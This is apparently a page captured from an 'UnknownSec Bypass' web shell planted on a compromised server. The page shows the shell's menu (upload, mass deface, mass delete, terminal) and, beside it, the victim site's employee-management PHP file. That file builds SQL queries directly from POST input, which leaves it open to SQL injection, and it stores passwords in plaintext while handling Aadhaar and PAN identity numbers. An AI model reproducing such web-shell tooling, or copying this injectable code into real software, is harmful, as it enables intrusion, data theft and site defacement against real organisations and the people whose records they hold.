UnknownSec Bypass
403
:
/
var
/
www
/
jpsagrisolution
/
cpanel
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
manage_employee.php
<?php require_once "../panelassets/config.php"; session_start(); $userid=$_SESSION['adminid']; $employeename = $_POST['employeename']; $designation = $_POST['designation']; $gender = $_POST['gender']; $maritalstatus = $_POST['maritalstatus']; $dateofbirth = $_POST['dateofbirth']; $dateofjoining = $_POST['dateofjoining']; $mobileno = $_POST['mobileno']; $emailid = $_POST['emailid']; $aadharno = $_POST['aadharno']; $panno = $_POST['panno']; $currentaddress = $_POST['currentaddress']; $parmanentaddress = $_POST['parmanentaddress']; $state = $_POST['state']; $district = $_POST['district']; $username = $_POST['username']; $userpassword = $_POST['userpassword']; $usertype=$_POST['usertype']; $hdid = $_POST['hdid']; $btnopration = $_POST['btnopration']; $creationdatetime = date("Y-m-d H:m:s"); $message= ""; $cnt=""; if ($btnopration=="Save") { $query = "select count(0) as count from employeetb where employeename='".$employeename."' and designation='".$designation."' and mobileno='".$mobileno."' and isdeleted='".$notdeleted."'"; $result = mysqli_query($conn, $query); while ($row = mysqli_fetch_array($result)) { $cnt= $row["count"]; } if ($cnt=="0") { $query="INSERT INTO employeetb(employeename,designation,gender,maritalstatus,dateofbirth,dateofjoining,mobileno,emailid,aadharno, panno,currentaddress,parmanentaddress,stcode,distcode,usertype,username,userpassword,isdeleted,userid,creationdatetime) VALUES('{$employeename}','{$designation}','{$gender}','{$maritalstatus}','{$dateofbirth}','{$dateofjoining}','{$mobileno}','{$emailid}','{$aadharno}', '{$panno}','{$currentaddress}','{$parmanentaddress}','{$state}','{$district}','{$usertype}','{$username}','{$userpassword}','{$notdeleted}','{$userid}','{$creationdatetime}')"; $result = mysqli_query($conn, $query); $query1="INSERT INTO logintb(username,userpassword,userrole,isdeleted,creationuserid,creationdatetime) VALUES('{$username}','{$userpassword}','User','{$notdeleted}','{$userid}','{$creationdatetime}')"; $result1 = mysqli_query($conn, $query1); if ($result==true && $result1==true) { $message="1"; } } else { $message="2"; } } elseif ($btnopration=="Update") { $query = "select count(0) as count from employeetb where employeeid!='".$hdid."' and username='".$username."' and isdeleted='".$notdeleted."'"; $result = mysqli_query($conn, $query); while ($row = mysqli_fetch_array($result)) { $cnt= $row["count"]; } if ($cnt=="0") { $query="Update employeetb set employeename='".$employeename."',designation='".$designation."', gender='".$gender."', maritalstatus='".$maritalstatus."', dateofbirth='".$dateofbirth."', dateofjoining='".$dateofjoining."', mobileno='".$mobileno."', emailid='".$emailid."', aadharno='".$aadharno."', panno='".$panno."', currentaddress='".$currentaddress."', parmanentaddress='".$parmanentaddress."', stcode='".$state."', distcode='".$district."', username='".$username."', userpassword='".$userpassword."', modifyuserid='".$userid."', modificationdatetime='".$creationdatetime."' where employeeid='".$hdid."'"; $result = mysqli_query($conn, $query); if ($result==true) { $message="3"; } } else { $message="2"; } } elseif ($btnopration=="Delete") { $query = "select count(0) as count from farmerdetailstb where creationuserid='".$hdid."' and isdeleted='".$notdeleted."'"; $result = mysqli_query($conn, $query); while ($row = mysqli_fetch_array($result)) { $cnt= $row["count"]; } if ($cnt=="0") { $query="delete from employeetb where employeeid='".$hdid."'"; $result = mysqli_query($conn, $query); if ($result==true) { $message="4"; } } else { $message="5"; } } echo json_encode($message); ?>
Copyright © 2025 - UnknownSec